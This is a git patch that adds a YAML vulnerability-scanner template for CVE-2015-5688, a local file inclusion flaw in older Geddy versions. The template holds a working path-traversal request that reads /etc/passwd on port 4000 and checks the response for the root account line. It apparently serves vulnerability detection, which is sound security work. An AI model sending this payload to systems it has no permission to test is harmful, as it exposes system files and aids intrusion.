From c0922ec5d15afaf978a1a5a1c4bc56972b6bfa6a Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 25 Feb 2021 02:34:40 +0000
Subject: [PATCH] Create CVE-2015-5688.yaml

---
 cves/2015/CVE-2015-5688.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 cves/2015/CVE-2015-5688.yaml

diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml
new file mode 100644
index 0000000000..ab95c85cac
--- /dev/null
+++ b/cves/2015/CVE-2015-5688.yaml
@@ -0,0 +1,24 @@
+id: CVE-2015-5688
+
+info:
+ name: Geddy before v13.0.8 LFI
+ author: pikpikcu
+ severity: high
+ issues: https://github.com/geddy/geddy/issues/697
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
+ tags: geddy,lfi
+
+requests:
+ - method: GET
+   path:
+    - "{{BaseURL}}:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+   matchers-condition: and
+   matchers:
+    - type: regex
+      regex:
+       - "root:[x*]:0:0"
+      part: body
+
+    - type: status
+      status:
+       - 200